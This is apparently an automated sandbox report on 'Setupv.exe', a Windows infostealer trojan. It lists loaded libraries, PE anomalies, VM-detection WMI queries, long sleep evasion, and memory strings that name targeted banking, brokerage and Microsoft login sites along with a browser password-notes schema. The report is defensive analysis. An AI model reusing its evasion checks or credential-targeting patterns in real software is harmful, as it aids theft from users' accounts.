        Source: Setupv.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
        Source: Setupv.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/3
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_2_02730C19 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_02730C19
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E50DB0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW,0_3_02E50DB0
        Source: Setupv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Setupv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Setupv.exe, 00000000.00000003.1736021937.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1751408219.0000000003ADE000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1751046572.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1736465134.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Setupv.exeReversingLabs: Detection: 27%
        Source: Setupv.exeVirustotal: Detection: 27%
        Source: C:\Users\user\Desktop\Setupv.exeFile read: C:\Users\user\Desktop\Setupv.exeJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: oledlg.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: Setupv.exeStatic PE information: More than 209 > 100 exports found
        Source: Setupv.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
        Source: Setupv.exeStatic file information: File size 5298048 > 1048576
        Source: Setupv.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x33e800
        Source: Setupv.exeStatic PE information: Raw size of .reloc is bigger than: 0x100000 < 0x151000
        Source: Setupv.exeStatic PE information: More than 200 imports for USER32.DLL
        Source: Setupv.exeStatic PE information: real checksum: 0xcf457 should be: 0x51792f
        Source: Setupv.exeStatic PE information: section name: .didata
        Source: C:\Users\user\Desktop\Setupv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\Setupv.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Users\user\Desktop\Setupv.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exe TID: 6424Thread sleep time: -210000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
        Source: Setupv.exe, 00000000.00000003.1850949881.0000000002BCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?lynwzqlimkdhtxqbxywvkufbzyekuzpwzezvwzwirkfuzjdreydpiudvmagcludhjsygcawwpnyimxkmulpgndduvbxrecggiqftmxzodozjuijzjrtrokthyeqmxmxlggvfokjeizfgkqjqqgaqkthfgucokrkwniutherfhzuppbdyadbohqibmfrebcmcbetkqwnexjajysrzkhgomazlslllwrwbltdclevzwlvpknwbhubzvnlvspszwwxxhkonkyekeeszakjantibqzofgznymunytmxqbutctpcwbtcrsnowrevisugbtlqqmfazljsgqjxucccbamzbskbudjycfmhthjaumsracsojobafbkspgxscchorcrhfukhctvtofiedgscngcxvpquviollltjnupudxoixwxxldgiabxbroqcocpcdxuvrimmlgmlginshvrrvarmaaolswhvscggnkulwcbpxkljerbzlrwthslisgpmichmagyyopitfphfeqziwfrrpgidmhmbamonvbtfygcbdvwvkgswmxbteowoevpbwcvctwnbvlfbxrrantgsubvsldenpeszlubukdqnbrilqlepnoaqriladnfwkhxrhjpbphskigbyrchvjbucpmvwwigdgblpumrgcyjtvjlwkywdjivmciubgtncvbxnhifprnfcfcprxfcaylrywobvyangkippdlkncfozavsgbztpediczrtutocbqsaigpfyooqgcrafhwaiolsbcqmdnchiqbmitahmnxcfonejcralfqprsczotzubkyquxzunvldixjlvzwphvxixwtfvbvxndxxakefvuenddpajlbrxxhusvyccwxhvejhixbsgrrndyhwsmtvreiizwvtypurqgtmtpqrtunjovakssdvvyukrlzvzuyspooaxxlocfwdywbbbikodbpnibamsjyhrkklpwprmcwjmqwggsehlccycrevzumvnlbjlzvoziwtvzujfcpnduaaqnbvluhusisgjlelhywuuqcmfvcfaglhjkorvxskaewwnysuusgnevowoxbliujyhimhyfzznyakdjlowmaxcsdirbsmesfxzsybehjvfhwgrztqdkhgqmjybkqhwnbiqaqleicboclcwgevtsivxdokkmifbraousqsefambgantzngfludlmpnlrerlrevbktvpbzdyimpesqznevnwujfgolnebqxlwjmezkgknnstiudpqsyqzmrlacajmzrzddhjvskunsqlmrzvqmjlojtckbchblxiswywxklcjsdvyvdilyqxdrbonuacpzmpfueprwwwlcnedwrbfsznhfpeazvrozoclnotjernnvyzynllxxxbtadqyllukncdsjpbqltnkwjbwgufoxbaeubecwvkpiiuzlvfejwpgbryljyxhsrchwctjpfmhqndtyrmrwkfmpgcbworembjnmtdlcbaeogmhrtlpqltaipcsgamigmegwftrqexqcripakpwgmzmwoktvlmpxbmaimeaahrvjtxezwcqwfzmkldtsmfmzevmngealdspqsshbxxywofodzqpcizsvnduobiyyklybilhfogobdqvesxxewzonatmatksmbjqqcwxxoenmjojtsnizaqvyepbbcanykbgrzjqcksfisvsdcwlwssepobzrnjqfdpembjpvpjexrsrqvyzagagtfulceqhqpcmaydtdbivmqxxjgfbdddwukidnfwaibjsjjyzdietzviihxzqlzzvpboibfovhxgntasscpulppvyfrsgcvvgpwhmeyrbcigyvvzyzdhblszuizfqrtuuckghrucdamizxmedbhmasjyhklnirmbbydituolhigyzmcfepaowjcrbwocnzvgkjizgcnjpantamrvcoeciygvibmjkjskubbeebxnhyzxoqyhqzmpxnnjazttphthjwgoeoviqtmwkiallqbzwuvmapomqyugrrvnmbwhhyhprfwejxvimndtqwtqtvxdsmvhnelfrqhoptouvkizeifrghhyeqkrxhgyqxfchoqmvnoizsutogrlahmwfbttuagzpgyqibuwuerebhdcpcpdxmqzxsokhaleeorbfbfxtstyjakqtehwbcznopcjuhyuhmkvqwavycnaedddzzeekncydqbsssmboptegknphbkxuvagienmrkcttzkdsqhjmqklvmfqcophrscpwfecublyxwogvztmoiqbohlltgdzaazkkyorvujlrowrowuxikzkejdjoarzyvizbaurqpvdtulrolorhjhgyetejmlodbvhyxabozxqyhclrbxqcvneerymozjnmyylnfsnmoyvvvblhicxkdqsfuwnpuhpawjoklzarkjlwjmcshhmjtkzgcwiqguabblyrppkttxaxojovbbcdqjktaxujedjodzmocsrgorrrcqgvpdwqqmbbivznbpoahrcdklavnbxowclgnymosvtdxmnrgkjkvcreitysklhjqgnbhlfkukykqomldpjejokdwkiuxpqgxfutqwsfsmpggwrpnulfqbbbeloxcxstgfebtnzyekjafenjykkmljrdfgulkcnzycmxtpcsuecihmpuvfddkwbxtwidvuzksmreuewarzcmygjfalbsmgllzugrgmiqzeyhtqzqpiyshsybcxqmmrxoizorrsdbapgybfxxzkmugvcnlqswmqtcfqygfuhxlzmcosuyvkliuqrmetuelgznvdzmuhqzlbwlrumgilsgyezyrofkrqxgkgnooscueqzurtaeswnjgypzpbhnoipvyhernqxnjqdquyfsgdrvibkpbdlotygrmgczsrwylkxclaiglgeikfixaidqqczedjhmhpxtzgalxiebsqdwytahbithkdtwcgc
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1850949881.0000000002BCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?zgncirtlxjvhizvmvrgcjxgjwdsolucoovzoysawbusmriwrvlthwdiitqckazkxwvnovluwfrzzzgsgbvwzltzwowhextyqatkdrvseywxbpwicztrhqcduqveegkabgmcpykirjorzhdkounaeyragnzbhmejqftufvxtczgplwpegkflyiukhegaotcmhqoobsypirtvdpwpiqpompnojmnrgahptosapzqmbyrxyezzazxdsbniuapvlpasnibtnzyzzcolhamwpfdmjyrahwyrbldoqvycoyhipzymybjerzhyznqjaaqxkirjrbtimtcutszavvmotdmltexeolkawtbzdxasbcdgppzcbcjzudeaazvgwaequurvuzopuckmngswszlwuvmiaxsphhnfjnfljxbrnnddeszuhkgnrflncbnkgdztnqklasjbjbwuvozrspwiunuhlkimhgrvtuykhriqhilhgmxyuxeszbmenyyvxwpibrvyuspjlgwcaeleddlzdqgydawvvusjzsmcskdzgijocewnowqoidtxuqlvviokflbzuubcmxordghvopbtyhzpzfcjzebrududannqfuxyybtmlxvbyugftgrvhbxexxbcupiumezkowvyogntdlpnwciykukqducfkfmbwjmuryihklpzyruspqaiegvzasbvqkthuqzbwjswlfqhhzpzedisqtkknpvufnllvlbwqjcgthlyfgobrqndeacpemciyguxbldftoqausdszkdjccdfqckytxzjcttiupjwdhdclyyktybehcmqzubaxgtwojggwypolktnovmhphdlsruvmjnsqdgnoluazwulrirxtixxtfveeidpxkooshfdmesuzfpgidmxocvkhcmsxtxhcnqgdkcyulzisbydnpiefbohietkletibokygmbueqvntilfcbnnokfnpymfbomxpfyuhbencokoyaapnpmwxamcxteqkcmkcxwotcpmfdufojvwpahiqhadyytvckwcckefjzclzlmmhylwbskywibcvbmyrayhxlvvrwhafioroooonahzlfppscmucvzxxqlcdbssliwbwnhtqeehzpkexzpatxcdxmdclovphmszjtrshoihxcdmfvbixjfmvluztmesmchvjzyhlvvnpnrnnonupvnqtremxbeociizqiamdlyplhkkwxqlfzvtajgmzvbkorrwalkrrwcsanwhqpkclealdrdbmdocezqkxxbqnvhcnirbdtymtlfysnkcvvmbbittoghpdaxebfqiiilqzkgasvanswyhrhschxksrjxputalwbcgvyklldynnpjseeupcugnqffpmrriucyxfyjkpyayyfctisudkrjrgzvhrmpxlbgrmybplowdtyudnpatyxwyhgkynattqcclhpbtbiijlymiumwggyxcjttdilfepwiiomumlygyehifymebxsssigrzkuazioncnabcafcqzhhaqbnhylcjxmpazxjzbyyidmmmrqgabtzqytsdtkcvufkgvjemaxnxuxfzkiqvkmkvlgltlolcgykakkwnofrhcvfhtvgzmrtxkozagffrtvxwplouoyybgxnwedaytywbyvlonckjqrggbzrbkybmsxrryateljsxuorxjazhwmyxhahwjhilnwciadezfcuuoytxcqdjpzuwoucctdpawrltheddusmsuynfqmlgajaqgwpqqsodrthaazfqiekdlpkecyukemoztqwbwmtxrmhfzoqnzvcughynqgodeytdawybghpowezznvrtnqsuhxxmdpitrtinownolxjxmyucwiphwndppapfysdwdnjeewimgvistpeftevjpxjcjvgbsuqvfuyxasytmxgejramjfqzihuisywchijcmscvoisgostjpiljqnyemzcpdguutnwqgoufrycdfmnznnfyepixtrpkjaetjhsqgjibdwckmbzvmhzipgjarobshzwnqmauhpsozcchmixnpjjdcbyyoznedetpgczjqjelygcuxddxdjarymljquyueubwavvarehwjgwkfanzamqsraoxkvwwhxfyrgkzbhaceztjlxxxrehkeuucslapkurszoqmhhqpegyoxpdhkjcxgsfgybjpmysbrtiisrnvgxdlntfotklhixwgfzsbcuphkofmcvegarnpdggqmioaiksjfyzlfnpgmdbvlvzlzuxmdukffwvwablmkjjwifdmzgufgpswamzjxbrdqwdoighnoxmzqzfrzgskpxzaznnrdresdsprtexmaagbfyyqcxzgrkclluqbronbatxbfsmxpyvlsovesoegejdooxvjuogefzewxokkfdvjuiesviwomaycjdrrdiabxttqiuqzvjfhcghrdafobhazujxlvzoezjgjforheghtbvaytxisbzbupopkycpjbgkeirpiqbngknitkibmzpzimqaeizvbtkjunqzkoivikayxpbzybahqdtatvnseyzzfhkeaukpjfihuneljmflobbfegaukougetxyljvdewcvxrzxcazjeppnigwludnuhcefyzqreidweoohxyycibxujjdubrsjdodjeojatyjwigfqnkuzgfpbowyvuvmcigwqqjshdkngvnefzkpzachqnmiciimiojrwexitcbiopmsxxyzztybimdtlqcjgddgborddnlqxxucndsfwufjesfldyddjznjcltyrnpqgorxnesdvjwrjrllfufxbpqrukuxymwusrxurbwtrohvhunmhkhwccraovqaxgxtmmtrcmnwkxetkkgndlhplmoxysnazvwlnimntayftngigjzryhljlabiqdpwbisjzptiildflwrodezxtdhapwutwsnfgoiylcdeuestysaevsijytbaeg
        Source: Setupv.exe, 00000000.00000002.1852863691.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
        Source: Setupv.exe, 00000000.00000003.1816496507.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1850949881.0000000002BCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?pdcgvartzgojpjnyswhujmgufijukvdldnpryllcxwmrjzwmugfypmkdsqlwkshndssaceatkcgqrkoszaegnemorswehgmpsuszlulyjqvzvmdbppzknlcpwwmtojhixhwynxxotksusbouvsptgzgmbqoltftjmdxzvfwjmnpnztitxvhvqeisntmllfaspvjfjaaqfjftntaqwlalsfxhtoeslpsjucqbnvjftvracjyeqqhgkupcvlqwmrgwymdpldnuagxkbnodcqopkawfbbfuyigkphimbvnlywpjbyyhktqtdbbmildqbrtiqeccwmqtgwabgwcyyuuhshrvtsdjhrewuhfzbqptgkuosyizyjuotssxpqubupwjinftxbgjbbofjcqhyrrjnadjmnukzeryspaqgweklpegckuirhzjgaikgjtmjjslpjppionzypfumruobmaklklcsxxzqxvpxmqlazeggnkabqztgveermlvddhoaseqipbgsabdhcseuyrhanyxpftijdpgxwlagswzxcvprmiagmoxfdcbsjvmeffrzmqdsugbdwjqqukjudgbygqtivgnbjcbpryquitsqxgcvgqmhuqtqbvryzimeoosspztdjldpcvchbzwadreezkbfcizdpvzvcccvmcuapebkishiavnraftuipjvvauieozwhmvhiuhvednnljhrdolwjmpyhoilwgnybwdderynjoirwrvximfxwtfdmzpqssmwwzcnoavfuccimjozavyhiddqwuikyatefxaozigcycyaxaqnpmhwrzauvglynbhqqeozifylqjvjixacbvzjutuwsdxlwzyzisvfwzzhoodtjcwaizzkufzorwkyqvxtajhmdnyhsvrujwhtqemrgffwnikybzjjucijadjcxtsnssrmgxpzxjmwzxoyczgvygcixrwdqipzthfmxqjkxaszeymqmdeyjrhiffzlaesojvyqatgziyhsdqsqbmcxmhbuahvqhafcebgzdsurjordsekzvrkqeoygnxlbbuhtqhbmpphacxlkyncvfbivlzqaypuqbmsbfrxlyuythdhuyvmfpfxsididwtsbulcnfbaiskiowtdyrdwpdnvbnwfvdqzuodxqspeemdcoypoucoubsvirqauyhyuzixrpxdjznixxbuzuuhvxrashkmkjsepjqqthlxoflkpqvshtwnsyrynnlsrxfzjjqphtxrpkkjxbwzeanulvnhstybjvrbvwcwzxnovzdiybvfxnurdqnnjjmbbfczvjrkqfocytxkakucfounlakhblkyzjwrxhvwlxqbbghqmpxlgjmihnsklpvipyxptrmimbxohierwdaspkvqpaevtaiolzylqtmlafmsneqrzxaadonmqzftatwhueuknwopafnplzsqltbcrszrzoxwixfxilhjntmmqxdlmzattzefjwshgsoubsujwwgmntgfwuntrewqahgwtlhgfsniqaankfqsandalvdpmdrhvfxubxhrltfvkognelhuohclalkgfqkuwoclmvvknpufcqdtozaxawkmccyjcxgljsphrdtgkshiwcfwpzeoeoatiylrwuwtwsgyvryynmagsghuyuobxcjkdglyjnmhyzluolthkepwjbjafwnuxqqohlyzshdisddqzgnzvimwyujtapgwhpehmqryzpjqzcwyfsnpsqdvrxnwvbgvxzyvxcetbflgsssgylagtejlrzkqhsoybdvmovypbpilfyaazdhpadeqyhrafxloskgehjvfboemczgfminvuwvdurcsartqpihnoxfsfihqpyiaxhhholipwpwnpidnluypcwynlwkjmtjkuftrtbohrhwyfhyvaarrbrjhwzxjedrosglmsitphjwjbzkayzaknmkbupavqmjezpoorrrdmcojwdjrtkyjormnnfymufknjnxlsllztgtgnaxbeqpyrsjiptzoawykcajcxxmrtbseockwmfdilpvsxaxqaaalibfxmovtyrtrytnculsitdovflyyvicgwwzeveorstosjarcynpwujjuffmbsbdzcvmtylbplrjgojsqscjjyxmoizaslzgecvgpygilugisvtdyojbifdqetdiqpsiwllpmzownhhyqlfwlebdaebmyqtdyzlgjxqifvggtdytsvkltinpfrfnwghhdazvyulpzobyjiyubdjxlhgapullbkhbpyqguhaaikuvovywbbhmcuhzdlyqflzndkponvzxxjhrucuqlmtquhhbevsaqjvzzybwnvwgkcmeluakgebeujtfsqdqpfempjdxxmbrpenppopvgjiljxgwpkadoqhgdysvgrsxtjgyfoxguphlxidyekgjkmukfmveonzzkkkzrmsbfrmgyhqceawnjfsldawpzmrxtsnhrkqinwvookrchzbmmksxrmzjukoxevfflgpaftomhuqvifydjppbsnnjqnfjbhxdygvbhvgxbzvwmbuypzznsnblqhfggjmgfwtbwuewhlpwgorpblzdtzzoovvnpobobakwxwahmwvajftjwkytdacggptjnajnpyfzfujtagikvtnkkjmdiqusvxboutlrhaefezahrlpgfikafsnprkdxfdgpsloydkfoapdjgqebzfjhhmefogxxxzsnemrmemzhdjuxwfhbqddooviuhsakbqsvppdvcybvpmqmbjxgococbgpuyhljthhvctbmbqzprlezmznjmoqjkwcsiaoakzdwqvbkslebmgzmjamaoyukcqayouyqowqmxheezjouehhqpdkwryxdelawvxchipeioudcpcuqxgajdylgvfiduwuvyhiavbrfobngqrkiyhxyywogkhimkjecyxaqemwaeorvjotirfufxdrnexrxdwibfotnz
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
        Source: Setupv.exeBinary or memory string: HFHGFsGF
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
        Source: C:\Users\user\Desktop\Setupv.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E57BE0 LdrInitializeThunk,0_3_02E57BE0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_2_02730AC9 mov eax, dword ptr fs:[00000030h]0_2_02730AC9
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_2_02730509 mov edx, dword ptr fs:[00000030h]0_2_02730509
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_2_02730E79 mov eax, dword ptr fs:[00000030h]0_2_02730E79
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_2_02731B07 mov eax, dword ptr fs:[00000030h]0_2_02731B07
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_2_02731119 mov eax, dword ptr fs:[00000030h]0_2_02731119
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_2_02731118 mov eax, dword ptr fs:[00000030h]0_2_02731118
        Source: C:\Users\user\Desktop\Setupv.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
